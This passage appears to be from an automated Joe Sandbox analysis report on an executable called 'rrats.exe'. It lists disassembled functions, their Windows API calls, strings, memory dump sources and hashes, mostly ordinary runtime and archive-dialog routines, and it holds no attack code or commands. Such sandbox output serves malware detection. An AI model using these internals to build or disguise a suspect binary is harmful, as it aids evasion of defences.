                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CCBF82
                                                              • _free.LIBCMT ref: 00CCBF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCBFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: f81ba7c967710e0ed18ee8beeb3009a3ed2a8c41340fdf2c1d660bbf5159db8b
                                                              • Instruction ID: 3a83af7ce3042abd76038bbabfae662f65e83949e84a153370c5a0c65a306d11
                                                              • Opcode Fuzzy Hash: f81ba7c967710e0ed18ee8beeb3009a3ed2a8c41340fdf2c1d660bbf5159db8b
                                                              • Instruction Fuzzy Hash: 3301D87AA022127F232116FA9C4EF7F6B6DDEC2B61714011EF904C2200EF608D0195B1
                                                              Function 00CC9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00CC91AD,00CCB188,?,00CC9813,00000001,00000364,?,00CC40EF,?,?,00CE1098), ref: 00CC986E
                                                              • _free.LIBCMT ref: 00CC98A3
                                                              • _free.LIBCMT ref: 00CC98CA
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC98D7
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC98E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: f6cc1fa2b6778f19fa2df099bf66aa9654f3e66e590224dc3dfd053d9461df16
                                                              • Instruction ID: 2662498e36d09c1808ef2d8d77581b6db7878228efaf491d919b3d110a581d1d
                                                              • Opcode Fuzzy Hash: f6cc1fa2b6778f19fa2df099bf66aa9654f3e66e590224dc3dfd053d9461df16
                                                              • Instruction Fuzzy Hash: FB01D1361466026BC2126369EC8DF2F2669DBD2770B21013EF525971E2EE348E05A265
                                                              Function 00CB0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CB11CF: ResetEvent.KERNEL32(?), ref: 00CB11E1
                                                                • Part of subcall function 00CB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CB11F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CB0F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00CB0F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00CB0F54
                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F60
                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F6C
                                                                • Part of subcall function 00CB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CB1101,?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FEA
                                                                • Part of subcall function 00CB0FE4: GetLastError.KERNEL32(?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: d1e31baf1df69b087d1612787caf9c437405a7677064bf9eeb6250611bd62428
                                                              • Instruction ID: 3e46236e75f5b444c271fd2d9f4df6e5fcf6bf122817922fe5f6cf1402ac45c4
                                                              • Opcode Fuzzy Hash: d1e31baf1df69b087d1612787caf9c437405a7677064bf9eeb6250611bd62428
                                                              • Instruction Fuzzy Hash: 8D017172501784EFC7229B64DC84BCAFBA9FB08710F10092EF26B92160CB757A45DB54
                                                              Function 00CCC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00CCC817
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CCC829
                                                              • _free.LIBCMT ref: 00CCC83B
                                                              • _free.LIBCMT ref: 00CCC84D
                                                              • _free.LIBCMT ref: 00CCC85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: b6f4c9139a27ecfc9b845ae5055163ff170a773b6b67a5a9c24462b3c2a6f084
                                                              • Instruction ID: d4256cc0cd3751cb87cc4cc0ae74544b5621e2d75f5be9096a5f0f594c33a364
                                                              • Opcode Fuzzy Hash: b6f4c9139a27ecfc9b845ae5055163ff170a773b6b67a5a9c24462b3c2a6f084
                                                              • Instruction Fuzzy Hash: CBF01D32905211ABC720EB68F8C6F1B73E9AA00714765181EF11DDB9D2CB70FD80DB64
                                                              Function 00CB1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CB1FE5
                                                              • _wcslen.LIBCMT ref: 00CB1FF6
                                                              • _wcslen.LIBCMT ref: 00CB2006
                                                              • _wcslen.LIBCMT ref: 00CB2014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CAB371,?,?,00000000,?,?,?), ref: 00CB202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 36cd688e7588aeab25b5528f9426693eebd6b0a3a9d04e9ba8da288f3fe00051
                                                              • Instruction ID: 149d326dd2253b2c6aba1ed4a8a97a0384ea746fb3a487cad80c6e6fcf056488
                                                              • Opcode Fuzzy Hash: 36cd688e7588aeab25b5528f9426693eebd6b0a3a9d04e9ba8da288f3fe00051
                                                              • Instruction Fuzzy Hash: F9F01D32008058BBCF226F51FC09ECE7F26EB44760F11C41AF61A9B062CB729661E790
                                                              Function 00CC8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00CC891E
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CC8930
                                                              • _free.LIBCMT ref: 00CC8943
                                                              • _free.LIBCMT ref: 00CC8954
                                                              • _free.LIBCMT ref: 00CC8965
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 71a481b79f49b5145e4a322f4c5a7bb1662e42cceb923f66078ccf27d15b08b0
                                                              • Instruction ID: 06d4b425d8ba2133287e5dbe975a36993440e63ea6eedb464d8d67d1c2af345a
                                                              • Opcode Fuzzy Hash: 71a481b79f49b5145e4a322f4c5a7bb1662e42cceb923f66078ccf27d15b08b0
                                                              • Instruction Fuzzy Hash: 03F01775C136238BC6067F28FC06B2A3BA1F724720342050AF119967B1CB324949ABA5
                                                              Function 00CB15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: 3f9a54ec706e61dbfe049b0fa2042a74e79abf30e91a59830b9a530e7c5afee6
                                                              • Instruction ID: 4e9a906eb6e86c4aa395811116793f17ef392ae75f239cd6c1490cd396be7a31
                                                              • Opcode Fuzzy Hash: 3f9a54ec706e61dbfe049b0fa2042a74e79abf30e91a59830b9a530e7c5afee6
                                                              • Instruction Fuzzy Hash: 81513931288304F6E6211A918C66FF67365FB16B04FAC4916FFA6750E1C9B3A910B71A
                                                              Function 00CC7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rrats.exe,00000104), ref: 00CC7FAE
                                                              • _free.LIBCMT ref: 00CC8079
                                                              • _free.LIBCMT ref: 00CC8083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\rrats.exe
                                                              • API String ID: 2506810119-1722972100
                                                              • Opcode ID: 4ad397ba5eddaba49315c695020a5fb5e4d87732f4b3870655ea60cdf9cc68d4
                                                              • Instruction ID: 7c719b0d90232c20a0a342ea9950f296ab623e23a7428ee04fa5c129e937f93a
                                                              • Opcode Fuzzy Hash: 4ad397ba5eddaba49315c695020a5fb5e4d87732f4b3870655ea60cdf9cc68d4
                                                              • Instruction Fuzzy Hash: CB318F71A00218AFDB21DF99D885FAFBBB8EB85310F10416EF51897211DB718E49DB61
                                                              Function 00CC31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CC31FB
                                                              • _abort.LIBCMT ref: 00CC3306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: bbf523ad8996d4fe7ff2565f52b1983d9bc6023f902bbc88c963b2f9a4403146
                                                              • Instruction ID: 9f9a71642d10421343a15911a4a03655eb7c39fbb4de31f2c4ad2f33bc881ee9
                                                              • Opcode Fuzzy Hash: bbf523ad8996d4fe7ff2565f52b1983d9bc6023f902bbc88c963b2f9a4403146
                                                              • Instruction Fuzzy Hash: 64415672900289AFCF15DF98DC81FEEBBB5BF08304F188059F915A7262D335AA51DB90
                                                              Function 00CA7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA7406
                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CA74CD
                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: f6fc30482c65b125f74af4b1eb3d24baee7f595ebc4c30b574322216c4af6772
                                                              • Instruction ID: 18feaabfaf4649f9179b5a63a2102a57ca59cf2a9b9de2239898d14c6fa22a68
                                                              • Opcode Fuzzy Hash: f6fc30482c65b125f74af4b1eb3d24baee7f595ebc4c30b574322216c4af6772
                                                              • Instruction Fuzzy Hash: D831B2B1D0429AAEDF11EBA4DC45BEE7BA9BF0A308F044116F815A7282C7748B44DB61
                                                              Function 00CBAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBAD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CBADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: c1705f817c5b065e75f76dece096c470d4d8049d1f19e3bac4f77972a1614bde
                                                              • Instruction ID: 680eefd3f54c42575355d2a13b01450a714dba3d5cac71e47a408d08e7a74c2f
                                                              • Opcode Fuzzy Hash: c1705f817c5b065e75f76dece096c470d4d8049d1f19e3bac4f77972a1614bde
                                                              • Instruction Fuzzy Hash: B5118E32240200BFE7119FB9DC45FEA7B6DAB4A742F400510F285EB6A0C762AA159736
                                                              Function 00CAD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 00CAD954
                                                              • _strncpy.LIBCMT ref: 00CAD99A
                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CE1030,?,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: f62116c7d6ea670fe366cbade8961c3aabde9d8f7ee0169b9ee8000a91c03cb7
                                                              • Instruction ID: 8262c66e347a6dbbd2603ca57d35e7488e3e0309336fb9266e1f3ee48ec31776
                                                              • Opcode Fuzzy Hash: f62116c7d6ea670fe366cbade8961c3aabde9d8f7ee0169b9ee8000a91c03cb7
                                                              • Instruction Fuzzy Hash: DE21D57294024DAEDB20EEB4CC05FDF3BA8AF02308F040022FA22965A2E631D648DB51
                                                              Function 00CB0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00CB0EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: ee5a0956578e84c6126998c001c68de95831d678edf8404ee8578e174488d58f
                                                              • Instruction ID: e1514ccabb70d98b800b5c7a0e80e94535dca0810ddaa1668dbdaed94097b7c0
                                                              • Opcode Fuzzy Hash: ee5a0956578e84c6126998c001c68de95831d678edf8404ee8578e174488d58f
                                                              • Instruction Fuzzy Hash: 001151B16407499FC3215F6A9C84AABFBECEBA5754F24482EF1DAC3200D671AA408B50
                                                              Function 00CBB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBB2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBB2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CBB304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              • API String ID: 445417207-3292211884
                                                              • Opcode ID: 3217e3f9a2751000a8428d5b113db9a81d066e2a2f803916e73fb2b612483405
